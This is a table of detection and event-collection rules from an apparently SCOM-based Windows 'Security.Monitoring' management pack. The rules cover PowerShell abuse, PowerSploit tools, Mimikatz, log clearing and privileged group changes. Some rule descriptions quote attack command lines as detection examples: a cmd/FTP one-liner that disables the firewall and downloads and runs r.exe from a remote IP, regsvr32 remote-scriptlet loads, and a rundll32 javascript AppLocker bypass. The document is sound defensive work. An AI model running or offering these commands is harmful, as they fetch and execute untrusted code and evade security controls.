All Rules in Security.Monitoring Management Pack

 DisplayNameDescriptionIDTargetCategoryEnabledInstance NameCounter NameFrequencyEvent_IDEvent SourceAlert GenerateAlert SeverityAlert PriorityRemotableEvent Log
Security.Monitoring.Collect.SMBv1ConnectionsSecurity Monitoring: Collect SMBv1 ConnectionsDescription for the new ruleSecurity.Monitoring.Collect.SMBv1ConnectionsMicrosoft.Windows.Server.OperatingSystemNoneTrue00FalseTrue
Security.Monitoring.CollectionRule.CollectLAPSEventsSecurity Monitoring: Collect LAPS EventsDescription for the new event collection rule.Security.Monitoring.CollectionRule.CollectLAPSEventsMicrosoft.Windows.Server.OperatingSystemEventCollectionTrue00FalseTrue
Security.Monitoring.CollectLegacyTLSEventsSecurity Monitoring: Collect Legacy TLS EventsThis collection rule will collect events created from TLS 1.0 or TLS 1.1. Run the associated report to see where this is happening in your environment. Security.Monitoring.CollectLegacyTLSEventsMicrosoft.Windows.Server.OperatingSystemEventCollectionTrue00FalseTrue
Security.Monitoring.Event.4688.GenericCryptoRansomWareSecurity Monitoring: Possible Crypto-Ransomware Installed on ComputerThis rule looks for common process creation events seen when certain types of malware are installed on a server. While it likely won't be useful for something that immediately acts, it could potentially detect versions configured to activate at a later time.Security.Monitoring.Event.4688.GenericCryptoRansomWareMicrosoft.Windows.Server.OperatingSystemAlertTrue04688TrueErrorNormalTrueSecurity
Security.Monitoring.Event.ByPassExecutionPolicySecurity Monitoring: PowerShell script run natively to bypass existing execution policyThis may be a normal event, depending on how an IT environment handles scripting. That said, this generates an alert if PowerShell is run to bypass current execution policy. See https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/ and https://nathangau.wordpress.com/2018/09/07/security-monitoring-additional-powershell-detections/ for details. Security.Monitoring.Event.ByPassExecutionPolicyMicrosoft.Windows.Server.OperatingSystemAlertTrue00TrueErrorNormalTrue
Security.Monitoring.Event.InvokeEncodedCommandSecurity Monitoring: PowerShell used to Invoke an Encoded CommandOne way to get around PowerShell parsing issues is to encode a command to a Base64 string. An attacker can also use this to obscure what they are really doing. This may be normal, and it may be malicious. See https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/ and https://nathangau.wordpress.com/2018/09/07/security-monitoring-additional-powershell-detections/ for details.Security.Monitoring.Event.InvokeEncodedCommandMicrosoft.Windows.Server.OperatingSystemAlertTrue00TrueErrorNormalTrue
Security.Monitoring.Event.InvokeRemoteExpressionSecurity Monitoring: PowerShell used to Invoke a Remote ExpressionThis may be a normal event, depending on how an IT environment handles scripting. That said, this generates an alert if PowerShell is run to execute something it is downloading from a web connection. See https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/ and https://nathangau.wordpress.com/2018/09/07/security-monitoring-additional-powershell-detections/ for details.Security.Monitoring.Event.InvokeRemoteExpressionMicrosoft.Windows.Server.OperatingSystemAlertTrue00TrueErrorNormalTrue
Security.Monitoring.Event.KillWindowsDefenderSecurity Monitoring: An attempt was made to kill Windows DefenderThis rule looks for 4688 events where a command was initiated to stop MsMpEng.exe, which is a windows defender core process. Audit process creation must be turned on. As well, the option to include command line in process creation events must also be on. Security.Monitoring.Event.KillWindowsDefenderMicrosoft.Windows.Server.OperatingSystemAlertTrue04688TrueErrorNormalTrueSecurity
Security.Monitoring.Event.PowerShellRuninMemoryOnlySecurity Monitoring: PowerShell Running Only in MemoryThere are valid reasons to run PowerShell in memory only. Attackers do this too as this can get around a lot of Antivirus checks and bypass execution policies. See https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/ and https://blogs.technet.microsoft.com/nathangau/2018/09/07/security-monitoring-additional-powershell-detections/ for details.Security.Monitoring.Event.PowerShellRuninMemoryOnlyMicrosoft.Windows.Server.OperatingSystemAlertTrue00TrueErrorNormalTrue
Security.Monitoring.Event.RemoteRegSvr32Security Monitoring: RegSvr32 used to load a DLL that is not located on this machineA little known RegSvr32 attack vector is the ability to load malicious DLL files for a location that the attacker controls. This can be over the internet or on an internal compromised host as RegSvr32 can take a URL with the correct sequence. This method of attack can bypass antivirus. A mitigation is in place using EMET, but if this tool is not in the environment, there is no way to detect it. Several known attack attack tools use this method. See https://attack.mitre.org/wiki/Technique/T1117#Examples for details. Security.Monitoring.Event.RemoteRegSvr32Microsoft.Windows.Server.OperatingSystemAlertTrue04688TrueErrorNormalTrueSecurity
Security.Monitoring.Event.SeDebugPrivilegeEscalationSecurity Monitoring: SeDebugPrivilege Escalation DetectedThis alert is generated when a process other than WMI assigns itself debug privileges.Security.Monitoring.Event.SeDebugPrivilegeEscalationMicrosoft.Windows.OperatingSystemAlertFalse00TrueErrorNormalTrueSecurity
Security.Monitoring.Event.WMIPersistenceSecurity Monitoring: Possible WMI Persistence Event DetectedSee this article for details. https://nathangau.wordpress.com/2019/03/06/using-scom-to-detect-wmi-persistence-attempts/Security.Monitoring.Event.WMIPersistenceMicrosoft.Windows.Server.OperatingSystemAlertTrue05861TrueErrorNormalTrueMicrosoft-Windows-WMI-Activity/Operational
Security.Monitoring.Event.WMIRemote.DestinationSecurity Monitoring: Possible WMI Remote Attempt Made To this SystemSee this article for details. https://nathangau.wordpress.com/2019/03/15/security-monitoring-using-scom-to-detect-remote-wmi-attempts/ Security.Monitoring.Event.WMIRemote.DestinationMicrosoft.Windows.Server.OperatingSystemAlertTrue04688TrueErrorNormalTrueSecurity
Security.Monitoring.Event.WMIRemote.SourceSecurity Monitoring: Possible WMI Remote Attempt Made From this SystemSee this article for details. https://nathangau.wordpress.com/2019/03/15/security-monitoring-using-scom-to-detect-remote-wmi-attempts/ Security.Monitoring.Event.WMIRemote.SourceMicrosoft.Windows.Server.OperatingSystemAlertTrue04648TrueErrorNormalTrueSecurity
Security.Monitoring.EventCollection.LanManSecurity Monitoring: Collect LANMAN AuthenticationCollection rule to collect all authentication events using LanManager to authenticate. This is an old protocol that has known vulnerabilities and should be shut off.Security.Monitoring.EventCollection.LanManMicrosoft.Windows.Server.OperatingSystemEventCollectionTrue00FalseTrue
Security.Monitoring.EventCollection.NTLMV1Security Monitoring: Collect NTLMV1 EventsCollection rule to collect all authentication events using NTLMv1 to authenticate. This is an old protocol that has known vulnerabilities and should be shut off.Security.Monitoring.EventCollection.NTLMV1Microsoft.Windows.Server.OperatingSystemEventCollectionTrue00FalseTrue
Security.Monitoring.EventCollection.WdigestAuthenticationSecurity Monitoring: Collect WDigest Authentication EventsIf the proper audit policies are turned on, this rule will collect WDigest logons. See https://blogs.technet.microsoft.com/kfalde/2014/11/02/kb2871997-and-wdigest-part-2/ for detailsSecurity.Monitoring.EventCollection.WdigestAuthenticationMicrosoft.Windows.Server.DC.ComputerEventCollectionTrue00FalseTrue
Security.Monitoring.ExecutableRunFromUserWriteableDirectorySecurity Monitoring: Executable Run from User Writeable Windows DirectoryThis rule looks for process creation from executables being run from key windows directories where processes should not be run.Security.Monitoring.ExecutableRunFromUserWriteableDirectoryMicrosoft.Windows.Server.OperatingSystemAlertTrue00TrueErrorNormalTrue
Security.Monitoring.ExecutableRuninWriteableDirectoriesExtendedSecurity Monitoring: Executable Run from User Writeable Windows Directory ExtendedThis rule will generate alerts when an executable is run in an OS Writeable Location. This rule will only run if the extended discovery is turned on.Security.Monitoring.ExecutableRuninWriteableDirectoriesExtendedSecurity.Monitoring.WriteableLocationsAlertTrue00TrueErrorNormalTrue
Security.Monitoring.ForwardedEvents.4688.GenericCryptoRansomWareSecurity Monitoring Forwarded Events: Possible Crypto-Ransomware Installed on ComputerThis rule looks for common process creation events seen when certain types of malware are installed on a server. While it likely won't be useful for something that immediately acts, it could potentially detect versions configured to activate at a later time.Security.Monitoring.ForwardedEvents.4688.GenericCryptoRansomWareWindowsEventCollectorDiscovery.EventLogCollectorServerAlertTrue04688TrueErrorNormalTrueForwardedEvents
Security.Monitoring.ForwardedEvents.ByPassExecutionPolicySecurity Monitoring Forwarded Events: PowerShell script run natively to bypass existing execution policyThis may be a normal event, depending on how an IT environment handles scripting. That said, this generates an alert if PowerShell is run to bypass current execution policy. See https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/ and https://nathangau.wordpress.com/2018/09/07/security-monitoring-additional-powershell-detections/ for details. Security.Monitoring.ForwardedEvents.ByPassExecutionPolicyWindowsEventCollectorDiscovery.EventLogCollectorServerAlertTrue04688TrueErrorNormalTrueForwardedEvents
Security.Monitoring.ForwardedEvents.CollectLAPSEventsSecurity Monitoring Forwarded Events: Collect LAPS EventsDescription for the new event collection rule.Security.Monitoring.ForwardedEvents.CollectLAPSEventsWindowsEventCollectorDiscovery.EventLogCollectorServerEventCollectionTrue00FalseTrue
Security.Monitoring.ForwardedEvents.DebugEscalationSecurity Monitoring Forwarded Events: SeDebug Privilege Escalation DetectedThis alert is generated when a process other than WMI assigns itself debug privileges.Security.Monitoring.ForwardedEvents.DebugEscalationWindowsEventCollectorDiscovery.EventLogCollectorServerAlertTrue00TrueErrorNormalTrueForwardedEvents
Security.Monitoring.ForwardedEvents.ExecutableRunFromUserWriteableDirectorySecurity Monitoring Forwarded Events: Executable Run from User Writeable Windows DirectoryThis rule looks for process creation from executables being run from key windows directories where processes should not be run.Security.Monitoring.ForwardedEvents.ExecutableRunFromUserWriteableDirectoryWindowsEventCollectorDiscovery.EventLogCollectorServerAlertTrue04688TrueErrorNormalTrueForwardedEvents
Security.Monitoring.ForwardedEvents.FindAVSignatureSecuity Monitoring Forwarded Events: PowerSploit FindAV Signature Tool is in UseFind-AVSignature is used to split a file into smaller chunks to detect which piece is being identified by AV. That part can be redesigned to avoid detection.Security.Monitoring.ForwardedEvents.FindAVSignatureWindowsEventCollectorDiscovery.EventLogCollectorServerAlertTrue0800TrueErrorNormalTrueForwardedEvents
Security.Monitoring.ForwardedEvents.GetDLLLoadPathSecurity Monitoring ForwardedEvents: Powersploit Get DLL Load Path is in UseGet-DLLLoad Path is used to find the name and location of a DLL that an application is using. The DLL can then be replaced with a malicious copy.Security.Monitoring.ForwardedEvents.GetDLLLoadPathWindowsEventCollectorDiscovery.EventLogCollectorServerAlertTrue0800TrueErrorNormalTrueForwardedEvents
Security.Monitoring.ForwardedEvents.GetHTTPStatusSecurity Monitoring Forwarded Events: PowerSploit HTTP Path Discovery Tool is in UseThis tool is used to dictionary a web server to determine the status of a path.Security.Monitoring.ForwardedEvents.GetHTTPStatusWindowsEventCollectorDiscovery.EventLogCollectorServerAlertTrue0800TrueErrorNormalTrueForwardedEvents
Security.Monitoring.ForwardedEvents.GetKeystrokeSecurity Monitoring Forwarded Events: PowerSploit Key Stroke Logger in UseThis is a PowerSploit tool that can be used to log key strokes.Security.Monitoring.ForwardedEvents.GetKeystrokeWindowsEventCollectorDiscovery.EventLogCollectorServerAlertTrue0800TrueErrorNormalTrueForwardedEvents
Security.Monitoring.ForwardedEvents.InvokeDLLInjectionSecurity Monitoring Forwarded Events: PowerSploit Invoke DLL Injection Command in UseA Powersploit tool used to inject code into DLL files is in use in the environment.Security.Monitoring.ForwardedEvents.InvokeDLLInjectionWindowsEventCollectorDiscovery.EventLogCollectorServerAlertTrue0800TrueErrorNormalTrueForwardedEvents
Security.Monitoring.ForwardedEvents.InvokeEncodedCommandSecurity Monitoring Forwarded Events: PowerShell used to Invoke an Encoded CommandOne way to get around PowerShell parsing issues is to encode a command to a Base64 string. An attacker can also use this to obscure what they are really doing. This may be normal, and it may be malicious. See https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/ and https://nathangau.wordpress.com/2018/09/07/security-monitoring-additional-powershell-detections/ for details.Security.Monitoring.ForwardedEvents.InvokeEncodedCommandWindowsEventCollectorDiscovery.EventLogCollectorServerAlertTrue04688TrueErrorNormalTrueForwardedEvents
Security.Monitoring.ForwardedEvents.InvokeMimikatzSecurity Monitoring Forwarded Events: Invoke-Mimikatz Detected in Tier 0 EnvironmentDescription for the new alert rule.Security.Monitoring.ForwardedEvents.InvokeMimikatzWindowsEventCollectorDiscovery.EventLogCollectorServerAlertTrue0800TrueErrorNormalTrueForwardedEvents
Security.Monitoring.ForwardedEvents.InvokeNinjaCopySecurity Monitoring Forwarded Events: Invoke Ninja Copy is in UseThis tool allows an attacker to make an offline copy of protected OS Secrets (i.e. the SAM) while they are in use.Security.Monitoring.ForwardedEvents.InvokeNinjaCopyWindowsEventCollectorDiscovery.EventLogCollectorServerAlertTrue0800TrueErrorNormalTrueForwardedEvents
Security.Monitoring.ForwardedEvents.InvokePortScanSecurity Monitoring Forwarded Events: Invoke Portscan is in UseThis looks for the Powersploit tool Invoke-Portscan, which is used to can IP addresses for open ports.Security.Monitoring.ForwardedEvents.InvokePortScanWindowsEventCollectorDiscovery.EventLogCollectorServerAlertTrue0800TrueErrorNormalTrueForwardedEvents
Security.Monitoring.ForwardedEvents.InvokeRemoteExpressionSecurity Monitoring Forwarded Events: PowerShell used to Invoke a Remote ExpressionThis may be a normal event, depending on how an IT environment handles scripting. That said, this generates an alert if PowerShell is run to execute something it is downloading from a web connection. See https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/ and https://nathangau.wordpress.com/2018/09/07/security-monitoring-additional-powershell-detections/ for details. Security.Monitoring.ForwardedEvents.InvokeRemoteExpressionWindowsEventCollectorDiscovery.EventLogCollectorServerAlertTrue04688TrueErrorNormalTrueForwardedEvents
Security.Monitoring.ForwardedEvents.InvokeShellCodeInUseSecurity Monitoring: Invoke ShellCode is in UseDescription for the new alert rule.Security.Monitoring.ForwardedEvents.InvokeShellCodeInUseWindowsEventCollectorDiscovery.EventLogCollectorServerAlertTrue0800TrueErrorNormalTrueForwardedEvents
Security.Monitoring.ForwardedEvents.KillWindowsDefenderSecurity Monitoring Forwarded Events: An attempt was made to kill Windows DefenderThis rule looks for 4688 events where a command was initiated to stop MsMpEng.exe, which is a windows defender core process. Audit process creation must be turned on. As well, the option to include command line in process creation events must also be on. Security.Monitoring.ForwardedEvents.KillWindowsDefenderWindowsEventCollectorDiscovery.EventLogCollectorServerAlertTrue04688TrueErrorNormalTrueForwardedEvents
Security.Monitoring.ForwardedEvents.PowerShellRuninMemoryOnlySecurity Monitoring Forwarded Events: PowerShell Running Only in MemoryThere are valid reasons to run PowerShell in memory only. Attackers do this too as this can get around a lot of Antivirus checks and bypass execution policies. See https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/ and https://nathangau.wordpress.com/2018/09/07/security-monitoring-additional-powershell-detections/ for details.Security.Monitoring.ForwardedEvents.PowerShellRuninMemoryOnlyWindowsEventCollectorDiscovery.EventLogCollectorServerAlertTrue04688TrueErrorNormalTrueForwardedEvents
Security.Monitoring.ForwardedEvents.PowerShellStartHiddenProcessSecurity Monitoring Forwarded Events: Hidden Process Starting Using PowerShellDescription for the new alert rule.Security.Monitoring.ForwardedEvents.PowerShellStartHiddenProcessWindowsEventCollectorDiscovery.EventLogCollectorServerAlertTrue0800TrueErrorNormalTrueForwardedEvents
Security.Monitoring.ForwardedEvents.RemoteRegSvr32Security Monitoring Forwarded Events: RegSvr32 used to load a DLL that is not located on this machineA little known RegSvr32 attack vector is the ability to load malicious DLL files for a location that the attacker controls. This can be over the internet or on an internal compromised host as RegSvr32 can take a URL with the correct sequence. This method of attack can bypass antivirus. A mitigation is in place using EMET, but if this tool is not in the environment, there is no way to detect it. Several known attack attack tools use this method. See https://attack.mitre.org/wiki/Technique/T1117#Examples for details. Security.Monitoring.ForwardedEvents.RemoteRegSvr32WindowsEventCollectorDiscovery.EventLogCollectorServerAlertTrue04688TrueErrorNormalTrueForwardedEvents
Security.Monitoring.PowerShellLog.FindAVSignatureSecuity Monitoring: PowerSploit FindAV Signature Tool is in UseFind-AVSignature is used to split a file into smaller chunks to detect which piece is being identified by AV. That part can be redesigned to avoid detection.Security.Monitoring.PowerShellLog.FindAVSignatureMicrosoft.Windows.Server.OperatingSystemAlertTrue0800TrueErrorNormalTrueWindows PowerShell
Security.Monitoring.PowerShellLog.GetDLLLoadPathSecurity Monitoring: Powersploit Get DLL Load Path is in UseGet-DLLLoad Path is used to find the name and location of a DLL that an application is using. The DLL can then be replaced with a malicious copy.Security.Monitoring.PowerShellLog.GetDLLLoadPathMicrosoft.Windows.Server.OperatingSystemAlertTrue0800TrueErrorNormalTrueWindows PowerShell
Security.Monitoring.PowerShellLog.GetHTTPStatusSecurity Monitoring: PowerSploit HTTP Path Discovery Tool is in UseThis tool is used to dictionary a web server to determine the status of a path.Security.Monitoring.PowerShellLog.GetHTTPStatusMicrosoft.Windows.Server.OperatingSystemAlertTrue0800TrueErrorNormalTrueWindows PowerShell
Security.Monitoring.PowerShellLog.GetKeystrokeSecurity Monitoring: PowerSploit Key Stroke Logger in UseThis is a PowerSploit tool that can be used to log key strokes.Security.Monitoring.PowerShellLog.GetKeystrokeMicrosoft.Windows.Server.OperatingSystemAlertTrue0800TrueErrorNormalTrueWindows PowerShell
Security.Monitoring.PowerShellLog.InvokeDLLInjectionSecurity Monitoring: PowerSploit Invoke DLL Injection Command in UseA Powersploit tool used to inject code into DLL files is in use in the environment.Security.Monitoring.PowerShellLog.InvokeDLLInjectionMicrosoft.Windows.Server.OperatingSystemAlertTrue0800TrueErrorNormalTrueWindows PowerShell
Security.Monitoring.PowerShellLog.InvokeMimikatzInUseSecurity Monitoring: Invoke-Mimikatz is in Use.Description for the new alert rule.Security.Monitoring.PowerShellLog.InvokeMimikatzInUseMicrosoft.Windows.Server.OperatingSystemAlertTrue0800TrueErrorNormalTrueWindows PowerShell
Security.Monitoring.PowerShellLog.InvokeNinjaCopySecurity Monitoring: Invoke Ninja Copy is in UseThis tool allows an attacker to make an offline copy of protected OS Secrets (i.e. the SAM) while they are in use.Security.Monitoring.PowerShellLog.InvokeNinjaCopyMicrosoft.Windows.Server.OperatingSystemAlertTrue0800TrueErrorNormalTrueWindows PowerShell
Security.Monitoring.PowerShellLog.InvokePortScanSecurity Monitoring: Invoke Portscan is in UseThis looks for the Powersploit tool Invoke-Portscan, which is used to can IP addresses for open ports.Security.Monitoring.PowerShellLog.InvokePortScanMicrosoft.Windows.Server.OperatingSystemAlertTrue0800TrueErrorNormalTrueWindows PowerShell
Security.Monitoring.PowerShellLog.InvokeShellCodeInUseSecurity Monitoring: Invoke ShellCode in UseDescription for the new alert rule.Security.Monitoring.PowerShellLog.InvokeShellCodeInUseMicrosoft.Windows.Server.OperatingSystemAlertTrue0800TrueErrorNormalTrueWindows PowerShell
Security.Monitoring.PowerShellLog.PowerShellStartHiddenProcessSecurity Monitoring: Hidden Process Starting Using PowerShellDescription for the new alert rule.Security.Monitoring.PowerShellLog.PowerShellStartHiddenProcessMicrosoft.Windows.Server.OperatingSystemAlertTrue0800TrueErrorNormalTrueWindows PowerShell
Security.Monitoring.SecurityLogClearedv2Security Monitoring: Security Event Log was Cleared.This rule monitors the security log for a log clearing event.Security.Monitoring.SecurityLogClearedv2Microsoft.Windows.Server.OperatingSystemAlertTrue00TrueErrorNormalTrue
Security.Monitoring.SecurityMonitoring.Event.DCOUModifySecurity Monitoring: Modification has been made to the DC OUSecurity.Monitoring.SecurityMonitoring.Event.DCOUModifyMicrosoft.Windows.Server.DC.ComputerAlertTrue00TrueErrorNormalTrueSecurity
Security.Monitoring.SecurityMonitoring.Event.GPOCreationSecurity Monitoring: A GPO was CreatedA new GPO has been createdSecurity.Monitoring.SecurityMonitoring.Event.GPOCreationMicrosoft.Windows.Server.DC.ComputerAlertTrue00TrueErrorNormalTrue
Security.Monitoring.SecurityMonitoring.Event.GPODeletionRuleSecurity Monitoring: A GPO was DeletedThis rule detects the deletion of a GPOSecurity.Monitoring.SecurityMonitoring.Event.GPODeletionRuleMicrosoft.Windows.Server.DC.ComputerAlertTrue00TrueErrorNormalTrue
Security.Monitoring.SecurityMonitoring.Event.ScheduledTaskCreatedOnServerSecurity Monitoring: A Scheduled Task Was Created On ServerA scheduled task was created on this server.Security.Monitoring.SecurityMonitoring.Event.ScheduledTaskCreatedOnServerMicrosoft.Windows.Server.OperatingSystemAlertTrue00TrueErrorNormalTrue
Security.Monitoring.SecurityMonitoring.Event.ServiceCreatedonDCSecurity Monitoring: A service was Created on a Domain ControllerThis rule tracks the creation of a service on a domain controller. There are overridable properties for up to 5 applications so as to reduce noise.Security.Monitoring.SecurityMonitoring.Event.ServiceCreatedonDCMicrosoft.Windows.Server.DC.ComputerAlertTrue00TrueErrorNormalTrue
Security.Monitoring.SuspiciousUserContextNew Alert RuleThis generates alerts off of commands being run from non-traditional user locations.Security.Monitoring.SuspiciousUserContextMicrosoft.Windows.Server.OperatingSystemAlertTrue00TrueErrorNormalTrue
Security.Monitoring.SystemLogClearedv2Security Monitoring: System Event Log was Cleared.This rule monitors the system log for a log clearing event.Security.Monitoring.SystemLogClearedv2Microsoft.Windows.Server.OperatingSystemAlertTrue00TrueErrorNormalTrue
SecurityMonitoring.Event.FailedLoginSecurity Monitoring: Failed RDP LogonSecurityMonitoring.Event.FailedLoginMicrosoft.Windows.Server.OperatingSystemCustomFalse00TrueWarningNormalTrue
SecurityMonitoring.Failed.Login.Attempts.CollectionCollect Failed Login AttemtsFailed Login AttemptsSecurityMonitoring.Failed.Login.Attempts.CollectionMicrosoft.Windows.ComputerEventCollectionTrue00FalseTrue
SecurityMonitoringMP.Accounts.DomainAdminChangeSecurity Monitoring: Domain Admins membership has changedSecurityMonitoringMP.Accounts.DomainAdminChangeMicrosoft.Windows.Server.DC.ComputerAlertTrue00TrueErrorNormalTrueSecurity
SecurityMonitoringMP.Accounts.EnterpriseAdminChangeSecurity Monitoring: Enterprise Admins membership has changedSecurityMonitoringMP.Accounts.EnterpriseAdminChangeMicrosoft.Windows.Server.DC.ComputerAlertTrue00TrueErrorNormalTrueSecurity
SecurityMonitoringMP.Accounts.LocalAdminChangeSecurity Monitoring: Local Administrators Group was ModifiedSecurityMonitoringMP.Accounts.LocalAdminChangeMicrosoft.Windows.Server.OperatingSystemAlertTrue00TrueErrorNormalTrue
SecurityMonitoringMP.Accounts.SchemaAdminChangeSecurity Monitoring: Schema Admins membership has changedSecurityMonitoringMP.Accounts.SchemaAdminChangeMicrosoft.Windows.Server.DC.ComputerAlertTrue00TrueErrorNormalTrueSecurity
SecurityMonitoringMP.APPLocker.MimikatzSecurity Monitoring: Mimikatz in useMimikatz is a credential theft tool used for pass the hash attacks. This should not be present in your environment.SecurityMonitoringMP.APPLocker.MimikatzMicrosoft.Windows.ComputerAlertFalse00TrueErrorNormalTrueMicrosoft-Windows-AppLocker/EXE and DLL
SecurityMonitoringMP.APPLocker.ProhibitedAppSecurity Monitoring: Prohibited App in UseSecurityMonitoringMP.APPLocker.ProhibitedAppMicrosoft.Windows.ComputerAlertTrue00TrueErrorNormalTrueMicrosoft-Windows-AppLocker/EXE and DLL
SecurityMonitoringMP.APPLocker.PSExecSecurity Monitoring: PSEXEC in UseSecurityMonitoringMP.APPLocker.PSExecMicrosoft.Windows.ComputerAlertFalse08003TrueErrorNormalTrueMicrosoft-Windows-AppLocker/EXE and DLL
SecurityMonitoringMP.APPLocker.WCESecurity Monitoring: WCE in UseWCE is a credential theft too used to perform pass the hash attacks and enumerate wdigest passwords if this is turned on in your environment. Other than penetration testing, there is little reason for this tool to exist in your environment. This should be investigated immediately.SecurityMonitoringMP.APPLocker.WCEMicrosoft.Windows.ComputerAlertFalse08003TrueErrorNormalTrueMicrosoft-Windows-AppLocker/EXE and DLL
SecurityMonitoringMP.APPLocker.WinRarSecurity Monitoring: WinRar in useSecurityMonitoringMP.APPLocker.WinRarMicrosoft.Windows.Server.OperatingSystemAlertFalse08003TrueErrorNormalTrueMicrosoft-Windows-AppLocker/EXE and DLL
SecurityMonitoringMP.Event.4688.SuspiciousApplockerJavaSecurity Monitoring: A suspicious process creation (AppLocker bypass) was executedTo bypass restrictive Applocker policies, attackers will implement a specially crafted commandline which makes use of Windows native exe "Rundll32.exe" (required by Windows to load and run code in DLLs and therefore not blocked by Applocker). Rundll32.exe can be used to call javascript to execute arbitrary commands which are not blocked by restrictive Applocker policies. The rundll32.exe syntax is as follows: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";<code> Events of this nature need to be investigatedSecurityMonitoringMP.Event.4688.SuspiciousApplockerJavaMicrosoft.Windows.Server.OperatingSystemAlertTrue04688TrueErrorNormalTrueSecurity
SecurityMonitoringMP.Event.4688.SuspiciousApplockerRegsvrSecurity Monitoring: A suspicious process creation (AppLocker bypass using regsvr32) was execuitedAppLocker Bypass Techniques using Regsvr32.exe (greg) Note: The following is already contained in SCUBA_RULE_Applocker_Bypass Examples: regsvr32 /s /n /u /i:file.sct scrobj.dll regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll regsvr32 /s /n /u /i:http://server/file.jpg scrobj.dllSecurityMonitoringMP.Event.4688.SuspiciousApplockerRegsvrMicrosoft.Windows.Server.OperatingSystemAlertTrue04688TrueErrorNormalTrueSecurity
SecurityMonitoringMP.Event.4688.SuspiciousCMDSecurity Monitoring: A suspicious process creation (cmd) was executedThese events should be investigated. We are tracking 4688 events with known strings often found in malicious scripts. While it is possible that there are normal conditions for this rule, any alert should be investigated immediately.SecurityMonitoringMP.Event.4688.SuspiciousCMDMicrosoft.Windows.Server.OperatingSystemAlertTrue04688TrueErrorNormalTrueSecurity
SecurityMonitoringMP.Event.4688.SuspiciousFTPCommandSecurity Monitoring: A suspicious process creation (FTP script execution via echo command) was executedDetection of FTP Scripts created via the Echo command: Based on several cases where compromised SQLService was used and SQL Agent Jobs were created to invoke ‘xp_cmdshell’ which in turn created and launched FTP scripts to download and run malware… Example of the commandline used to create and run ftp scripts: "Command Line ": "\"\"\"C:\\Windows\\System32\\cmd.exe\"\" /c \"\"net1 stop sharedaccess&echo open 222.186.58.12 >> love.txt&echo 123>> love.txt&echo 123>> love.txt&echo binary >> love.txt&echo get r.exe >> love.txt&echo bye >> love.txt&ftp -s:love.txt&p -s:love.txt&r.exe&r.exe&del love.txt /q /f&exit\"\"\" This type of event is rare and should be investigatedSecurityMonitoringMP.Event.4688.SuspiciousFTPCommandMicrosoft.Windows.Server.OperatingSystemAlertTrue04688TrueErrorNormalTrueSecurity
SecurityMonitoringMP.Event.4688.SuspiciousRegSecurity Monitoring: A suspicious process creation (registry) was executedThis rule inventories 4688 events and flags alerts for manually added registry keys. These are rare events and should be investigated when they appear.SecurityMonitoringMP.Event.4688.SuspiciousRegMicrosoft.Windows.Server.OperatingSystemAlertTrue04688TrueErrorNormalTrueSecurity
SecurityMonitoringMP.Event.4688.SuspiciousWindowsPositionSecurity Monitoring; A suspicious process creation (malicious use of WindowPosition with PowerShell) was executedSee: https://technet.microsoft.com/en-us/library/cc957410.aspx The WindowPosition value specifies the position of the command window on the user's screen. The value of this entry is an 8-byte hexadecimal value. The first four bytes (high word) represent the position of the window on the X (horizontal) axis. The last four bytes (low word) represent the position of the window on the Y (vertical) axis. When the WindowPosition value is set to 201329664, (Hex: 0x0c00 0c00) this places the console in a non-visible section of the user’s screen (where X axis=0c00 and the Y axis=0c00) in an area that is hidden from view below the visible start menu/taskbar Other console apps that can be modified to make the screen non-visible SecurityMonitoringMP.Event.4688.SuspiciousWindowsPositionMicrosoft.Windows.Server.OperatingSystemAlertTrue04688TrueErrorNormalTrueSecurity
SecurityMonitoringMP.Event.GoldenTicketDetectionSecurity Monitoring: Possible Golden Ticket in UseSecurityMonitoringMP.Event.GoldenTicketDetectionMicrosoft.Windows.Server.DC.ComputerAlertTrue04769TrueErrorNormalTrueSecurity
SecurityMonitoringMP.Event.LocalAccountCreatedonServerSecurity Monitoring: Local account created on a member serverIn a normal environment, this will only happen when the system is setup. You should not see this event on production member servers at allSecurityMonitoringMP.Event.LocalAccountCreatedonServerMicrosoft.Windows.Server.OperatingSystemAlertTrue00TrueErrorNormalTrueSecurity
SecurityMonitoringMP.Event.SecurityLogClearedSecurity Monitoring: Security Log was clearedClearing the security log is something an attacker will do to cover their tracks. By default, logs cycle. If the log has been cleared, this should be investigated.SecurityMonitoringMP.Event.SecurityLogClearedMicrosoft.Windows.Server.OperatingSystemAlertFalse01102Microsoft-Windows-EventlogTrueErrorNormalTrueSecurity
SecurityMonitoringMP.Event.ServiceCreatedonMemberServerSecurity Monitoring: A service was created on a member serverI would consider enabling this rule for any production server that is in a steady state. No services should be created at this point, and any event where one is created would be worthy of investigation.SecurityMonitoringMP.Event.ServiceCreatedonMemberServerMicrosoft.Windows.Server.OperatingSystemAlertFalse00TrueErrorNormalTrueSystem
SecurityMonitoringMP.Event.ServiceKnownThreatSecurity Monitoring: Service associated with a known threat was created on a member serverThis is a special case of event ID 7045 targeting the names of services that are created by known tools such as windows credential editor, psexec, etc. If you turned on the generic 7045 rule, this alert should be disabled as it will generate duplicate events.SecurityMonitoringMP.Event.ServiceKnownThreatMicrosoft.Windows.Server.OperatingSystemAlertTrue07045TrueErrorNormalTrueSystem
SecurityMonitoringMP.Event.SmartCardDisabledSecurity Monitoring: A Smart Card has been Disabled to Allow for Interactive LogonSomeone has purposely desected the option to disable smart card authentication for the account. Verify that this has in fact been approved.SecurityMonitoringMP.Event.SmartCardDisabledMicrosoft.Windows.Server.DC.ComputerAlertTrue04738TrueErrorNormalTrueSecurity
SecurityMonitoringMP.Event.SoftwareInstallOnServerSecurity Monitoring: Software was Installed on a ServerThis rule look sfor 11707 events in the application log and alerts accordingly. Note that patches will likely be flagged with this rule, so it should be turned on if there is a good maintenance process in placeSecurityMonitoringMP.Event.SoftwareInstallOnServerMicrosoft.Windows.Server.OperatingSystemAlertFalse011707MsiInstallerTrueWarningNormalTrueApplication
